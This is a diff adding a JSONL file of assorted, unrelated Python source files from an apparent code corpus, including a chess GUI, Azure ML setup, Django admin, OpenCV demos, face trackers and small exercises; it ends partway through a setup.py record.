diff --git "a/4630.jsonl" "b/4630.jsonl" new file mode 100644--- /dev/null +++ "b/4630.jsonl" @@ -0,0 +1,625 @@ +{"seq_id":"351117423","text":"\"\"\"\nA GUI chess board that can be interacted with, and pieces moved around on.\n\"\"\"\n\nimport os\n\nimport PySimpleGUI as psg\nimport time\nfrom chessington.engine.board import Board, BOARD_SIZE\nfrom chessington.engine.data import Player, Square\nfrom chessington.engine.pieces import Pawn, Knight, Bishop, Rook, Queen, King\nfrom chessington.engine.chess_bot import ChessBotRandom, ChessBotDefense, ChessBotStronk, NuChessBotStronk\n\nIMAGES_BASE_DIRECTORY = 'images'\n\nBLACK_SQUARE_COLOUR = '#B58863'\nWHITE_SQUARE_COLOUR = '#F0D9B5'\nFROM_SQUARE_COLOUR = '#33A1FF'\nTO_SQUARE_COLOUR = '#B633FF'\n\ndef get_image_name_from_piece(piece):\n if piece is None:\n return os.path.join(IMAGES_BASE_DIRECTORY, 'blank.png')\n class_to_piece_name = { Pawn: 'pawn', Knight: 'knight', Bishop: 'bishop', Rook: 'rook', Queen: 'queen', King: 'king' }\n player_to_colour_suffix = { Player.WHITE: 'w', Player.BLACK: 'b' }\n image_name = class_to_piece_name[piece.__class__] + player_to_colour_suffix[piece.player] + '.png'\n return os.path.join(IMAGES_BASE_DIRECTORY, image_name)\n\ndef get_key_from_square(square):\n return (square.row, square.col)\n\ndef get_square_colour(square):\n return BLACK_SQUARE_COLOUR if square.row % 2 == square.col % 2 else WHITE_SQUARE_COLOUR\n\ndef render_square(board, square):\n piece = board.get_piece(square)\n image_file = get_image_name_from_piece(piece)\n square_colour = get_square_colour(square)\n key = get_key_from_square(square)\n return psg.Button('', image_filename=image_file, size=(1, 1), button_color=('white', square_colour), pad=(0, 0), key=key)\n\ndef render_board(board):\n return [[render_square(board, Square.at(row, col)) for col in range(BOARD_SIZE)] for row in range(BOARD_SIZE - 1, -1, -1)] + [[psg.Button(\"Continue\")]]\n\ndef update_pieces(window, board):\n for row in range(BOARD_SIZE):\n for col in range(BOARD_SIZE):\n image_file = get_image_name_from_piece(board.get_piece(Square.at(row, col)))\n element = window.FindElement(key=(row, col))\n element.Update(image_filename=image_file)\n\ndef set_square_colour(window, square, colour):\n element = window.FindElement(key=(square.row, square.col))\n element.Update(button_color=('white', colour))\n\ndef reset_square_colours(window):\n for row in range(BOARD_SIZE):\n for col in range(BOARD_SIZE):\n colour = get_square_colour(Square.at(row, col))\n element = window.FindElement(key=(row, col))\n element.Update(button_color=('white', colour))\n\ndef highlight_squares(window, from_square, to_squares):\n reset_square_colours(window)\n if from_square is not None:\n set_square_colour(window, from_square, FROM_SQUARE_COLOUR)\n for square in to_squares:\n set_square_colour(window, square, TO_SQUARE_COLOUR)\n\n\n\ndef play_game():\n psg.ChangeLookAndFeel('GreenTan')\n\n board = Board.at_starting_position()\n board_layout = render_board(board)\n window = psg.Window('Chessington', default_button_element_size=(12, 1), auto_size_buttons=False).Layout(board_layout)\n\n from_square = None\n to_squares = []\n\n def handle_click(row, col):\n\n nonlocal window, board, from_square, to_squares\n clicked_piece = board.get_piece(Square.at(row, col))\n\n # If making an allowed move, then make it\n if from_square is not None and any(s.row == row and s.col == col for s in to_squares):\n board.get_piece(from_square).move_to(board, Square.at(row, col))\n from_square, to_squares = None, []\n\n # If clicking 
on a piece whose turn it is, get its allowed moves\n elif clicked_piece is not None and clicked_piece.player == board.current_player:\n from_square = Square.at(row, col)\n to_squares = clicked_piece.get_available_moves(board)\n\n # Otherwise reset everthing to default\n else:\n from_square, to_squares = None, []\n\n # def activate_bot(window, board, , ):\n # move = ChessBotStronk().do_smart_move(board)\n # handle_click(*move[0])\n # highlight_squares(window, from_square, to_squares)\n # update_pieces(window, board)\n #\n # button, _ = window.Read()\n # if button is not None:\n # handle_click(*move[1])\n # highlight_squares(window, from_square, to_squares)\n # update_pieces(window, board)\n button, _ = window.Read()\n while True:\n counter = 0\n if board.current_player == Player.WHITE:\n '''\n Bot code\n '''\n player = Player.WHITE\n opponent = Player.BLACK\n move = ChessBotStronk(player, opponent).get_move(board)\n if move is not None:\n handle_click(*move[0])\n highlight_squares(window, from_square, to_squares)\n button, _ = window.Read(timeout=40)\n # if button is not None:\n handle_click(*move[1])\n highlight_squares(window, from_square, to_squares)\n update_pieces(window, board)\n else:\n button, _ = window.Read()\n\n '''\n Player code\n '''\n # button, _ = window.Read()\n # if button is not None:\n # handle_click(*button)\n # highlight_squares(window, from_square, to_squares)\n # update_pieces(window, board)\n\n if board.current_player == Player.BLACK:\n \"\"\"\n Bot code\n \"\"\"\n player = Player.BLACK\n opponent = Player.WHITE\n move = NuChessBotStronk(player, opponent).get_move(board)\n if move is not None:\n handle_click(*move[0])\n highlight_squares(window, from_square, to_squares)\n button, _ = window.Read(timeout=40)\n # if button is not None:\n handle_click(*move[1])\n highlight_squares(window, from_square, to_squares)\n update_pieces(window, board)\n else:\n button, _ = window.Read()\n\n # Update the UI\n highlight_squares(window, from_square, to_squares)\n update_pieces(window, board)\n\n","sub_path":"chessington/ui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"256971203","text":"import sys\nfrom xml.dom import minidom\n\nclass func_wrap:\n\tdef __init__(self, func_obj):\n\t\tself.func = func_obj\n\t\tself.call_count = 0\n\tdef call_once(self):\n\t\tif(self.call_count == 0):\n\t\t\tself.func()\n\t\t\tself.call_count = self.call_count + 1\n\tdef call(self):\n\t\tself.func()\n\t\t++self.call_count\n\tdef called(self):\n\t\treturn self.call_count > 0\n\n\ndef open_xml(filename):\n\txmldoc = None\n\ttry:\n\t\txmldoc = minidom.parse(filename)\n\texcept:\n\t\tprint (\"FAILURE: coulnot parse\", filename)\n\t\tprint (sys.exc_info)\n\treturn xmldoc\n\ndef close_xml(xmldoc, filename=None):\n\t\n\tif filename:\n\t\tfile_handle = open(filename,\"w\")\n\t\txmldoc.writexml(file_handle, encoding='utf-8')\n\t\tfile_handle.close()\n\n\t\t#work around, xml parser unnecessarly remove whitespaces and converts \" to "\n\t\t#revert maadi\n\t\tfile_handle = open(filename,\"r\")\n\t\ttext = file_handle.read()\n\t\tfile_handle.close()\n\t\tfile_handle = open(filename,\"w\")\n\t\t\n\t\ttext = text.replace(\"?>\\n\" ,\" />\")\n\t\ttext = text.replace(\"><\" ,\">\\n<\")\n\t\t#file_handle = open(fileFullPath, \"w\")\n\t\tfile_handle.write(text)\n\t\tfile_handle.close()\n\n\txmldoc.unlink()\n\n\ndef correct_child_element(xmldoc, parent_element, element_name, 
element_value, debug_text = \"\", add_if_not_found = True):\n\tchild_objs = parent_element.getElementsByTagName(element_name)\n\tno_of_corrections = 0\n\tif child_objs:\n\t\tchild_obj = child_objs[0]\n\t\tcurrent_child_value = child_obj.firstChild.nodeValue\n\t\tif current_child_value.lower() != element_value.lower():\n\t\t\tchild_obj.firstChild.replaceWholeText(element_value)\t\n\t\t\tprint (\"Correction : \", element_name, \"for\", debug_text, \"to\", element_value)\n\t\t\tno_of_corrections += 1\n\telif add_if_not_found:\n\t\tchild_obj = xmldoc.createElement(element_name)\n\t\tchild_obj.appendChild(xmldoc.createTextNode(element_value))\n\t\tparent_element.appendChild(child_obj)\n\t\tprint (\"Correction : adding \", element_name, \"for\", debug_text, \":\", element_value)\n\t\tno_of_corrections += 1\n\n\treturn no_of_corrections","sub_path":"Python/misc_help.py","file_name":"misc_help.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156643021","text":"from azureml.core import Workspace\nfrom azureml.core.compute import AmlCompute\nfrom azureml.core.compute import ComputeTarget\nfrom azureml.core.compute_target import ComputeTargetException\n\n\nws = Workspace.from_config(path=\"./.azureml\", _file_name=\"config.json\") # This automatically looks for a directory .azureml\n\n# Choose a name for your CPU cluster\ncpu_cluster_name = \"cpu-clu-pep\"\n\n# Verify that the cluster does not exist already\ntry:\n cpu_cluster = ComputeTarget(workspace=ws, name=cpu_cluster_name)\n print(\"Found existing cluster, use it.\")\nexcept Exception:\n compute_config = AmlCompute.provisioning_configuration(\n vm_size=\"STANDARD_D2_V2\",\n idle_seconds_before_scaledown=2400,\n min_nodes=0,\n max_nodes=2,\n )\n cpu_cluster = ComputeTarget.create(ws, cpu_cluster_name, compute_config)\n\ncpu_cluster.wait_for_completion(show_output=True)\n","sub_path":"02-create-compute.py","file_name":"02-create-compute.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"176099718","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom enquete.models import *\n\n\n\"\"\" Aqui é a classe \"\"\"\n\nclass OpcaoAdmin(admin.StackedInline):\n\n\tmodel = Opcao\n\textra = 5\nclass EnqueteAdmin(admin.ModelAdmin):\n\tfieldsets = [\n\t\t\t\t(None, \t\t\t\t{'fields':['questao']}),\n\t\t\t\t('Date information',{'fields':['data_publicacao']})\n\t]\n\tinlines = [OpcaoAdmin]\n\tlist_display = ('questao', 'data_publicacao', 'publicado_hoje')\n\tlist_filter = ['data_publicacao', 'questao']\n\tdate_hierarchy = 'data_publicacao'\nadmin.site.register(Enquete, EnqueteAdmin)\n\n# Register your models here.\n","sub_path":"meus_projetos/enquete/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"498323095","text":"#!/usr/bin/env python2.7\n\n'''Space Weather Tests'''\n\n#built-in libraries\nimport unittest\nimport time\nimport datetime\n\n#external libraries\n#...\n\n#internal libraries\nimport space_weather\n\n#constants\nMINUTE = datetime.timedelta(minutes=1)\nHOUR = datetime.timedelta(hours=1)\n\nclass SpaceWeatherTestCase(unittest.TestCase):\n\n def setUp(self):\n space_weather.get_logger()\n\n def test_level_none(self):\n '''[BAD] Info ... 
if level < 1 for at least 90 minutes'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - 90 * MINUTE, 1.1),\n (dt - 85 * MINUTE, 0.9)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.NOTSET)\n\n def test_level_info(self):\n '''[GOOD] Info ... if level < 1 for at least 90 minutes'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - 2 * HOUR, 0.9)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.INFO)\n\n def test_level_warning(self):\n '''Warning ... if level > 1'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - MINUTE, 1.1)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.WARNING)\n\n def test_level_alert(self):\n '''Alert ... if level > 10'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - MINUTE, 10.1)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.ALERT)\n\n def test_level_critical(self):\n '''Alert ... if level > 100'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - MINUTE, 100.1)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.CRITICAL)\n\n def test_email(self):\n '''Email address should be configurable'''\n now = time.time()\n level, value = space_weather.ALERT, 11\n data = [(now, value)]\n imgfile = 'test.png'\n fromaddr = 'space.weather@planet.com'\n toaddr = 'test@example.com'\n\n space_weather.generate_plot(now, data, imgfile)\n msg = space_weather.generate_email(level, value, imgfile,\n fromaddr, toaddr)\n self.assertEqual(msg['From'], fromaddr)\n self.assertEqual(msg['To'], toaddr)\n\n def test_schema(self):\n '''The alert API schema'''\n level, value = space_weather.WARNING, 9.9\n link = 'http://www.example.com/test.txt'\n headers, body = (space_weather.generate_alert\n (level, value, link))\n self.assertEqual(headers['Content-Type'],\n 'application/json')\n self.assertIn('alert_text', body)\n self.assertIn('level', body)\n self.assertIn('link', body)\n self.assertIn('Space weather', body['alert_text'])\n self.assertIn(space_weather.LEVEL_MAP[level].lower(),\n body['alert_text'])\n self.assertIn('> 10 MeV proton flux', body['alert_text'])\n self.assertIn('currently at', body['alert_text'])\n self.assertEqual(body['level'], space_weather.LEVEL_MAP[level])\n self.assertEqual(body['link'], link)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_space_weather.py","file_name":"test_space_weather.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461704664","text":"# Find the sum of the digits in the number N\nimport math\n\nfor _ in range(int(input())):\n n = int(input())\n digisum = 0\n n = math.factorial(n)\n while n:\n digisum += n%10\n n = n//10\n print(digisum)\n","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15926883","text":"import numpy as np\r\n\r\nID, t1, t2, t3, t4, t5, t6, t7, t8, t = np.genfromtxt(\"../V204_Waermeleitf/Messung_1(statisch).txt\", unpack=True)\r\n\r\n# squash all temp arrays into another array. 
this helps for the iteration\r\ntemps = [t1, t2, t3, t4, t5, t6, t7, t8]\r\n\r\n# the target values at which the temps are to be extracted\r\nt_selected = [60, 150, 295, 475, 640]\r\n# an new 2 dim array for the extracted values\r\ntemps_new = [[],[],[],[],[],[],[],[]]\r\n\r\ni = 0\r\nj = 0\r\nwhile i < len(t_selected):\r\n # if the values match\r\n if t[j] == t_selected[i]:\r\n k = 0\r\n # iterate through and append the vlaues to the new array\r\n for y in temps:\r\n temps_new[k].append(y[j])\r\n k += 1\r\n i += 1\r\n j += 1\r\n\r\n\r\nprint(temps_new)\r\n\r\n# brass wide\r\n# close: T2, far: T1\r\n# brass narrow\r\n# close: T3, far: T4\r\n# aluminum\r\n# close: T6, far: T5\r\n# stainless steel\r\n# close: T7, far: T8\r\n\r\ndelta_T_brass_wide = []\r\ndelta_T_brass_narrow = []\r\ndelta_T_aluminum = []\r\ndelta_T_stainless_steel= []\r\n\r\ni = 0\r\nwhile i < len(t_selected):\r\n delta_T_brass_wide.append(temps_new[1][i]-temps_new[0][i])\r\n delta_T_brass_narrow.append(temps_new[2][i]-temps_new[3][i])\r\n delta_T_aluminum.append(temps_new[5][i]-temps_new[4][i])\r\n delta_T_stainless_steel.append(temps_new[6][i]-temps_new[7][i])\r\n i += 1\r\n\r\nprint(f\"diff 1: {delta_T_brass_wide}\\n diff 1: {delta_T_brass_narrow}\\n diff 1: {delta_T_aluminum}\\n diff 1: {delta_T_stainless_steel}\\n\")\r\n\r\n# units in cm²\r\nA_narrow = 0.000028\r\nA_normal = 0.000048\r\n\r\n# unit in cm\r\ndelta_x = 0.03\r\n\r\n# kappa\r\nk_brass = 112\r\nk_aluminum = 221\r\nk_edelstahl = 46\r\n\r\ndQ_per_dt = [[], [], [], [], []]\r\n\r\ni = 0\r\nwhile i < len(t_selected):\r\n dQ_per_dt[i].append(A_normal/delta_x*delta_T_brass_wide[i]*k_brass)\r\n dQ_per_dt[i].append(A_narrow/delta_x*delta_T_brass_narrow[i]*k_brass)\r\n dQ_per_dt[i].append(A_normal/delta_x*delta_T_aluminum[i]*k_aluminum)\r\n dQ_per_dt[i].append(A_normal/delta_x*delta_T_stainless_steel[i]*k_edelstahl)\r\n i += 1\r\n\r\nprint(dQ_per_dt)","sub_path":"Hilfsmittel/waermestrom.py","file_name":"waermestrom.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"123180921","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.historic_date import HistoricDate # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass TimeFrame(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, start: HistoricDate=None, end: HistoricDate=None): # noqa: E501\n \"\"\"TimeFrame - a model defined in Swagger\n\n :param start: The start of this TimeFrame. # noqa: E501\n :type start: HistoricDate\n :param end: The end of this TimeFrame. # noqa: E501\n :type end: HistoricDate\n \"\"\"\n self.swagger_types = {\n 'start': HistoricDate,\n 'end': HistoricDate\n }\n\n self.attribute_map = {\n 'start': 'start',\n 'end': 'end'\n }\n self._start = start\n self._end = end\n\n @classmethod\n def from_dict(cls, dikt) -> 'TimeFrame':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The TimeFrame of this TimeFrame. 
# noqa: E501\n :rtype: TimeFrame\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def start(self) -> HistoricDate:\n \"\"\"Gets the start of this TimeFrame.\n\n\n :return: The start of this TimeFrame.\n :rtype: HistoricDate\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start: HistoricDate):\n \"\"\"Sets the start of this TimeFrame.\n\n\n :param start: The start of this TimeFrame.\n :type start: HistoricDate\n \"\"\"\n if start is None:\n raise ValueError(\"Invalid value for `start`, must not be `None`\") # noqa: E501\n\n self._start = start\n\n @property\n def end(self) -> HistoricDate:\n \"\"\"Gets the end of this TimeFrame.\n\n\n :return: The end of this TimeFrame.\n :rtype: HistoricDate\n \"\"\"\n return self._end\n\n @end.setter\n def end(self, end: HistoricDate):\n \"\"\"Sets the end of this TimeFrame.\n\n\n :param end: The end of this TimeFrame.\n :type end: HistoricDate\n \"\"\"\n\n self._end = end\n","sub_path":"swagger_server/models/time_frame.py","file_name":"time_frame.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446535970","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017年4月14日\n\n@author: chenyitao\n'''\nimport logging\nimport os\nimport setproctitle\n\nimport gevent.monkey\ngevent.monkey.patch_all()\n\nfrom tddc import WorkerManager\nfrom worker.checker import Checker\n\nlogging.getLogger('urllib3').setLevel(logging.WARN)\nlog = logging.getLogger(__name__)\n\n\nclass ProxyCheckerManager(WorkerManager):\n '''\n classdocs\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n log.info('Proxy Checker Is Starting')\n super(ProxyCheckerManager, self).__init__()\n self._checker = Checker()\n log.info('Proxy Checker Was Ready.')\n\n @staticmethod\n def start():\n if os.path.exists('./worker.log'):\n os.remove('./worker.log')\n ProxyCheckerManager()\n while True:\n gevent.sleep(100)\n\n\ndef main():\n worker_type = 2\n worker_tables = {1: 'proxy_source_updater',\n 2: 'proxy_checker'}\n setproctitle.setproctitle(worker_tables[worker_type])\n if worker_type == 1:\n from worker.proxies_source_updater import ProxySourceUpdater\n ProxySourceUpdater().start()\n elif worker_type == 2:\n ProxyCheckerManager.start()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"check_client.py","file_name":"check_client.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"306589151","text":"\n'''\n利用有道翻译进行在线翻译\n'''\n\nimport urllib.request\nimport urllib.parse\nimport json\n\ntargetURL = \"http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule\"\n\ndata = {}\ndata['i'] = 'PIG'\ndata['from'] = 'AUTO'\ndata['to'] = 'AUTO'\ndata['smartresult'] = 'dict'\ndata['client'] = 'fanyideskweb'\ndata['salt'] = '16028975973203'\ndata['sign'] = '6b534b3a7875f70ed5b4a8ee39091ef2'\ndata['lts'] = '1602897597320'\ndata['bv'] = '4abf2733c66fbf953861095a23a839a8'\ndata['doctype'] = 'json'\ndata['version'] = '2.1'\ndata['keyfrom'] = 'fanyi.web'\ndata['action'] = 'FY_BY_REALTlME'\ndata = urllib.parse.urlencode(data).encode('utf-8')\n\nhtml = urllib.request.urlopen(targetURL, data)\n# 读取并解码内容\nrst = html.read().decode(\"utf-8\")\ntarget = 
json.loads(rst)\nprint(target['translateResult'][0][0]['tgt'])\n","sub_path":"46爬虫/访问网络代码2_无隐藏.py","file_name":"访问网络代码2_无隐藏.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13384610","text":"\"\"\"\r\n어떤 큰 도화지에 그림이 그려져 있을 때, 그 그림의 개수와, 그 그림 중 넓이가 가장 넓은 것의 넓이를 출력하여라. \r\n단, 그림이라는 것은 1로 연결된 것을 한 그림이라고 정의하자. \r\n가로나 세로로 연결된 것은 연결이 된 것이고 대각선으로 연결이 된 것은 떨어진 그림이다. \r\n그림의 넓이란 그림에 포함된 1의 개수이다.\r\n\r\n\r\n입력\r\n첫째 줄에 도화지의 세로 크기 n(1 ≤ n ≤ 500)과 가로 크기 m(1 ≤ m ≤ 500)이 차례로 주어진다. \r\n두 번째 줄부터 n+1 줄 까지 그림의 정보가 주어진다. (단 그림의 정보는 0과 1이 공백을 두고 주어지며, \r\n0은 색칠이 안된 부분, 1은 색칠이 된 부분을 의미한다)\r\n\r\n출력\r\n첫째 줄에는 그림의 개수, 둘째 줄에는 그 중 가장 넓은 그림의 넓이를 출력하여라. \r\n단, 그림이 하나도 없는 경우에는 가장 넓은 그림의 넓이는 0이다.\r\n\r\n\r\n예제 입력\r\n6 5\r\n1 1 0 1 1\r\n0 1 1 0 0\r\n0 0 0 0 0\r\n1 0 1 1 1\r\n0 0 1 1 1\r\n0 0 1 1 1\r\n예제 출력 \r\n4\r\n9\r\n\"\"\"\r\n\r\nfrom collections import deque\r\n\r\n\r\nn, m = map(int, input().split())\r\nmaps = []\r\nvisited = [[0 for _ in range(m)] for _ in range(n)]\r\nmaps = [list(map(int,input().split())) for _ in range(n)]\r\n\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\nans = []\r\n\r\n\r\ndef dfs(i, j) :\r\n count = 1\r\n visited[i][j] = 1\r\n \r\n q = deque()\r\n q.append([i, j])\r\n\r\n while len(q) != 0 :\r\n x, y = q.popleft()\r\n\r\n for i in range(4) :\r\n nx, ny = x + dx[i], y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < m :\r\n if visited[nx][ny] == 0 and maps[nx][ny] != 0 :\r\n maps[nx][ny] = maps[x][y] + 1\r\n visited[nx][ny] = 1\r\n\r\n count += 1\r\n q.append([nx, ny]) \r\n ans.append(count)\r\n\r\n\r\n\r\nfor i in range(n) :\r\n for j in range(m) :\r\n if maps[i][j] == 1: dfs(i, j)\r\n\r\n\r\n\r\nif (len(ans) == 0) :\r\n print(0)\r\n print(0)\r\nelse :\r\n print(len(ans))\r\n print(max(ans))\r\n","sub_path":"Baekjoon_1926.py","file_name":"Baekjoon_1926.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"269349724","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : morph.py\n# @Time : 2019/10/10 12:48\n# @Author : Rivarrl\n# ======================================\n\nimport cv2\nimport numpy as np\nimport basic.config as cfg\n\nimg = cv2.imread(cfg.PIC_LOULOUCAT)\nkernel = np.ones((5,5), np.uint8)\n# 腐蚀\nerosion = cv2.erode(img, kernel, iterations=1)\n# 膨胀\ndilation = cv2.dilate(img, kernel, iterations=1)\n# 开运算\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n# 闭运算\nclosing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n# 形态学梯度\ngradient = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\n# 礼帽\ntophat = cv2.morphologyEx(img, cv2.MORPH_TOPHAT, kernel)\n# 黑帽\nblackhat = cv2.morphologyEx(img, cv2.MORPH_BLACKHAT, kernel)\n\ncv2.imshow('img', img)\ncv2.imshow('erosion', erosion)\ncv2.imshow('dilation', dilation)\ncv2.imshow('opening', opening)\ncv2.imshow('closing', closing)\ncv2.imshow('gradient', gradient)\ncv2.imshow('tophat', tophat)\ncv2.imshow('blackhat', blackhat)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"basic/image/morphology/morph.py","file_name":"morph.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636369190","text":"import cv2\nimport numpy as np\nfrom face.sort import Sort\n\n\nclass OpticalFlowTracker:\n \n def __init__(self, frame, bboxes, names):\n # bboxes: np.array([[x1, y1, x2, y2], [x1, y1, x2, y2], ...], dtype=int)\n # 
names: list(str)\n self.names = names\n bboxes = self.tlbr2tlwh(bboxes)\n self.trackers = cv2.MultiTracker_create()\n for x, y, w, h in bboxes:\n tracker = cv2.TrackerMedianFlow_create()\n self.trackers.add(tracker, frame, (x, y, w, h))\n \n def track(self, frame):\n ret, bboxes = self.trackers.update(frame)\n bboxes = np.array(bboxes).reshape(-1, 4).round().astype(int)\n bboxes = self.tlwh2tlbr(bboxes)\n return ret, bboxes, self.names\n \n @staticmethod\n def tlbr2tlwh(bboxes):\n bboxes = bboxes.copy()\n bboxes[:, [2, 3]] -= bboxes[:, [0, 1]]\n return bboxes\n \n @staticmethod\n def tlwh2tlbr(bboxes):\n bboxes = bboxes.copy()\n bboxes[:, [2, 3]] += bboxes[:, [0, 1]]\n return bboxes\n \n# tracker.save(\"TrackerMedianFlow.json\")\n# fs = cv2.FileStorage(\"TrackerMedianFlow.json\", cv2.FileStorage_READ)\n# tracker.read(fs.getFirstTopLevelNode())\n# fs.release()\n#\n# try tracking with multiprocessing.dummy\n\n\nclass KalmanFilterTracker:\n \n def __init__(self, bboxes, confs, names, max_age=20, min_hits=0, iou_threshold=0.25):\n # bboxes: np.array([[x1, y1, x2, y2], [x1, y1, x2, y2], ...], dtype=int)\n # confs: np.array([float])\n # names: list(str)\n self.tracker = Sort(max_age=max_age, min_hits=min_hits, iou_threshold=iou_threshold)\n bboxes = np.hstack((bboxes, confs.reshape(-1, 1)))\n bboxes = self.tracker.update(bboxes)\n self.idx2name = dict()\n for idx, name in zip(bboxes[:, -1].astype(int).tolist(), names):\n self.idx2name[idx] = name \n \n def track(self, bboxes, confs):\n bboxes = np.hstack((bboxes, confs.reshape(-1, 1)))\n bboxes = self.tracker.update(bboxes)\n names = []\n ret = True\n for idx in bboxes[:, -1].astype(int):\n if idx in self.idx2name:\n names.append(self.idx2name[idx])\n else:\n names.append(None)\n ret = False\n bboxes = bboxes[:, :-1].round().astype(int)\n return ret, bboxes, names","sub_path":"src/face/trackers.py","file_name":"trackers.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"148656498","text":"import json\nimport sys\nimport random\n\nrandom.seed(42)\n\n\ndef complementarity_score(data, candidates, covered_rel_types):\n scores = []\n for i in candidates:\n dic = data[i]\n if len(dic[\"tokens\"]) > 120:\n scores.append((0, i))\n continue\n relations = dic[\"relations\"]\n item_types = set([rel[\"type\"] for rel in relations])\n diff = item_types - covered_rel_types\n scores.append((len(diff), i))\n return scores\n\ndef rank(data):\n selected = []\n candidates = set(list(range(len(data))))\n covered_rel_types = set()\n for i in range(len(data)):\n scores = complementarity_score(data, candidates, covered_rel_types)\n s = max(scores)[1]\n selected.append(s)\n candidates.remove(s)\n covered_rel_types.update([rel[\"type\"] for rel in data[s][\"relations\"]])\n return selected\n\n\n\ninfile = open(sys.argv[1], encoding=\"utf-8\")\noutfile = open(sys.argv[2], \"w\", encoding=\"utf-8\")\n\ndata = json.load(infile)\ninfile.close()\n\nrandom.shuffle(data)\n\nselected = rank(data)\n\nres = [data[s] for s in selected]\n\njson.dump(res, outfile, indent=4)\n\n","sub_path":"nerre/scripts/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452558106","text":"import io\nimport os\nimport re\nimport setuptools\n\n\ndef _read(*names, **kwargs):\n # Credits: https://packaging.python.org/single_source_version.\n here = os.path.dirname(__file__)\n 
encoding = kwargs.get('encoding', 'utf8')\n with io.open(os.path.join(here, *names), encoding=encoding) as fp:\n return fp.read()\n\n\ndef _findVersion(*filePaths):\n # Credits: https://packaging.python.org/single_source_version.\n versionFile = _read(*filePaths)\n versionMatch = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n versionFile, re.M)\n if versionMatch:\n return versionMatch.group(1)\n\n raise RuntimeError(\"Unable to find the version string.\")\n\n\nsetuptools.setup(\n name='bana',\n version=_findVersion('bana', '__init__.py'),\n description=\"Set of extensions for Autodesk Maya's Python API\",\n long_description=_read('README.rst'),\n keywords='Autodesk Maya gorilla API extensions monkey patch patching revl',\n license='MIT',\n url='https://github.com/christophercrouzet/bana',\n author=\"Christopher Crouzet\",\n author_email='christopher.crouzet@gmail.com',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities',\n ],\n install_requires=['gorilla>=0.2.0'],\n extras_require={\n 'dev': ['coverage', 'pycodestyle', 'pydocstyle', 'pylint',\n 'sphinx>=1.3', 'revl'],\n 'docs': 